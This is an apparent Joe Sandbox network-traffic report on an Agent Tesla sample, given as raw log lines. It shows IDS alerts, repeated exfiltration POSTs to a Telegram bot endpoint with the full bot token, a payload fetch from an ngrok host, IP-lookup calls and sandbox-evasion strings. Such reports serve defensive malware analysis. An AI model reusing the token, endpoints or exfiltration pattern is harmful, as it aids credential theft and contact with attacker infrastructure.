              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50005 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:49995 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50016 -> 149.154.167.220:443
              Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.5:50016 -> 149.154.167.220:443
              Source: unknown DNS query: name: api.telegram.org
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd50fd7cec3be6 Host: api.telegram.org Content-Length: 971 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd510e292b104f Host: api.telegram.org Content-Length: 912 Expect: 100-continue
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd50f95a4e2a64 Host: api.telegram.org Content-Length: 971 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd5108a399824d Host: api.telegram.org Content-Length: 912 Expect: 100-continue
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd50f95f9c48d7 Host: api.telegram.org Content-Length: 971 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd510a0cec50c6 Host: api.telegram.org Content-Length: 912 Expect: 100-continue
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd5d31f9dcb229 Host: api.telegram.org Content-Length: 66496 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd563df02e18ff Host: api.telegram.org Content-Length: 66699 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd6c1cb84d1689 Host: api.telegram.org Content-Length: 66488 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd6eeddd0e296d Host: api.telegram.org Content-Length: 66488 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd6522beff5f0a Host: api.telegram.org Content-Length: 66488 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd71c332c9539e Host: api.telegram.org Content-Length: 66488 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd73db318d0f97 Host: api.telegram.org Content-Length: 66488 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd67a5afe26105 Host: api.telegram.org Content-Length: 66488 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd77d60012a77a Host: api.telegram.org Content-Length: 66488 Expect: 100-continue
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd79ba4bbf7f60 Host: api.telegram.org Content-Length: 66488 Expect: 100-continue
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd7c7ea6e772a3 Host: api.telegram.org Content-Length: 71356 Expect: 100-continue
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd6d021c9dd24c Host: api.telegram.org Content-Length: 66488 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd84ee588da49a Host: api.telegram.org Content-Length: 66481 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd871f04c62b47 Host: api.telegram.org Content-Length: 66481 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd78284f97f23a Host: api.telegram.org Content-Length: 66481 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd90e3b20fec41 Host: api.telegram.org Content-Length: 66481 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd95ab240b67d6 Host: api.telegram.org Content-Length: 66481 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd81d75b28d528 Host: api.telegram.org Content-Length: 66481 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd9fbed3a15e79 Host: api.telegram.org Content-Length: 66659 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dda430a7dc875e Host: api.telegram.org Content-Length: 66474 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dda7927d4fb1b6 Host: api.telegram.org Content-Length: 66474 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd932e1414c9ad Host: api.telegram.org Content-Length: 66474 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8ddb20456626a77 Host: api.telegram.org Content-Length: 66474 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd985bd704922f Host: api.telegram.org Content-Length: 66474 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8ddb77cc655a0d3 Host: api.telegram.org Content-Length: 66474 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd50de0349e491 Host: api.telegram.org Content-Length: 66474 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd50de039af4a9 Host: api.telegram.org Content-Length: 70134 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
              Source: Joe Sandbox View IP Address: 208.95.112.1
              Source: Joe Sandbox View IP Address: 149.154.167.220
              Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknown DNS query: name: api.ipify.org
              Source: unknown DNS query: name: api.ipify.org
              Source: unknown DNS query: name: ip-api.com
              Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET //Winhost.pif HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: kvrcmhqc.ngrok.io Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET //Winhost.pif HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: kvrcmhqc.ngrok.io Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET //Winhost.pif HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: kvrcmhqc.ngrok.io Connection: Keep-Alive
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET //Winhost.pif HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: kvrcmhqc.ngrok.io Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET //Winhost.pif HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: kvrcmhqc.ngrok.io Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET //Winhost.pif HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: kvrcmhqc.ngrok.io Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
              Source: global traffic DNS traffic detected: DNS query: api.ipify.org
              Source: global traffic DNS traffic detected: DNS query: ip-api.com
              Source: global traffic DNS traffic detected: DNS query: kvrcmhqc.ngrok.io
              Source: global traffic DNS traffic detected: DNS query: api.telegram.org
              Source: unknown HTTP traffic detected: POST /bot7592112496:AAHWqmde0X-FJ2N0RbGUCzjKZ_SOBvB4Yd0/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd50fd7cec3be6 Host: api.telegram.org Content-Length: 971 Expect: 100-continue Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close Content-Type: text/plain Ngrok-Error-Code: ERR_NGROK_3200 Date: Wed, 19 Feb 2025 17:03:32 GMT Content-Length: 62
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close Content-Type: text/plain Ngrok-Error-Code: ERR_NGROK_3200 Date: Wed, 19 Feb 2025 17:03:49 GMT Content-Length: 62
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close Content-Type: text/plain Ngrok-Error-Code: ERR_NGROK_3200 Date: Wed, 19 Feb 2025 17:03:57 GMT Content-Length: 62
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000007241000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.000000000735F000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.00000000072FF000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000007412000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.00000000070A2000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007EB4000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007D1F000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007B6C000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007E75000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007D2F000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007F13000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007D01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr String found in binary or memory: http://confuser.codeplex.com
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Bearerlhttp://docs.oasis-open.org/ws-sx/ws-trust/20
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512Vhttp://schemas.xmlsoap.org/ws/2005/02/trustthttp://
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdNhttp://schemas.xm
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://goo.gl/YroZm
              Source: OgBoRN.exe, 00000003.00000002.2401382417.0000000007B46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006E5E000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007B46000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007994000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting(snxhk.dll%SbieDll.dll
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://logging.apache.org/log4net/release/faq.html#trouble-EventLog
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: http://portal.microsoftazure.de/
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://portal.microsoftazure.de/Bhttps://login.microsoftonline.de/
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Microsoft.Azure.Common.Authentication
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Microsoft.WindowsAzure.Commands.Utilities.Common
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Microsoft.WindowsAzure.ServiceManagement
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/http
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006E01000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007B01000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/Xhttp://schemas.xmlsoap.org/ws/2004/09/policyfhttp://schemas.microso
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: http://www.galasoft.ch/s/dialogmessage.
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: http://www.galasoft.ch/s/dialogmessage.-
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006E01000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007B01000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006E01000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007B01000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006E01000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007B01000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
              Source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.drString found in binary or memory: https://api.loganalytics.io/v14azuredatalakeanalytics.net
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4588154499.0000000004E68000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2379183705.0000000005789000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4598853145.0000000005869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.loganalytics.io/v16https://api.loganalytics.io
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
              Source: gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000007241000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.0000000006ECB000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.000000000735F000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.00000000072FF000.00000004.00000800.00020000.00000000.sdmp, gq8sce-clean.com.com.exe, 00000000.00000002.4620180662.00000000070A2000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007EB4000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000007D1F000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007B6C000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007E75000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007D2F000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007F13000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000004.00000002.4629529277.0000000007D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
